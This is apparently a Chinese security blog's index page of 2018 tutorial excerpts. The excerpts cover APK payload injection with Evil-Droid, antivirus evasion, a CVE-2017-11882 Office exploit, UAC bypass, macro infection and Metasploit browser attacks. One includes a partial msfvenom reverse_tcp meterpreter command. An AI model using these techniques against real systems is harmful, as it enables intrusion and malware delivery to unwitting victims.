Posts

Evil-Droid

发布于 2018-9-7

这个教程是对 APK 进行注入 Payload 的,利用就是 Evil-Droid (翻译是:做坏事的机器人),下载地址是:https://github.com/M4sc3r4n0/Evil-Droid 在Kali中 使用 Git命令来 安装我们的软件 git clone ...

0
965

bypass Windows 10

发布于 2018-9-5

1.实现内网穿透的办法 a.免费的 ngrok (URL:https://ngrok.com/) ngrok 是一个免费的内网穿透的,但是正因为免费,所以使用他的时候有一些小的弊端。         弊端:每次使用都要...

1
835

CVE-2017-11882实战免杀

发布于 2018-7-4

目录   一:生成payload 二:创建C#工程文件 三:将生成的exe转换成js 四:结合web server 五:office上场 一:生成payload 使用msfvenom生成C#的payload ...

0
985

Pastezort|MSF|Powershell|免杀

发布于 2018-7-3

1.下载并运行 git clone https://github.com/ZettaHack/PasteZort.git python PasteZ0rt.py 2.选择平台 选择目标平台,我这...

0
913

Powerstager免杀

发布于 2018-7-3

该脚本创建一个可执行的stager,该stager下载选定的powershell payload,将其加载到内存中,并使用模糊的EC方法执行它 0x1 ►Installation: - git clone https://github.com/z0noxz/powerstag...

0
346

MSF后渗透绕过UAC

发布于 2018-6-13

以下属于获取的权限在administrator组里,但是因为UAC而获取不到system权限的情况                 ...

0
876

VBScript感染

发布于 2018-6-12

VBScript感染方式 -利用宏 感染excl和wrod文档 -生成VBscript脚本 msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -e...

0
297

MSF 客户端渗透(浏览器)

发布于 2018-6-12

一 use auxiliary/server/browser_autopwn2 模块会筛选出高质量的payload同时开启,依次对被害者主机执行。 设置好端口、接收IP和url地址就可以了,接下来把它列出的网站地址发给受害人。等待接收session ...

0
355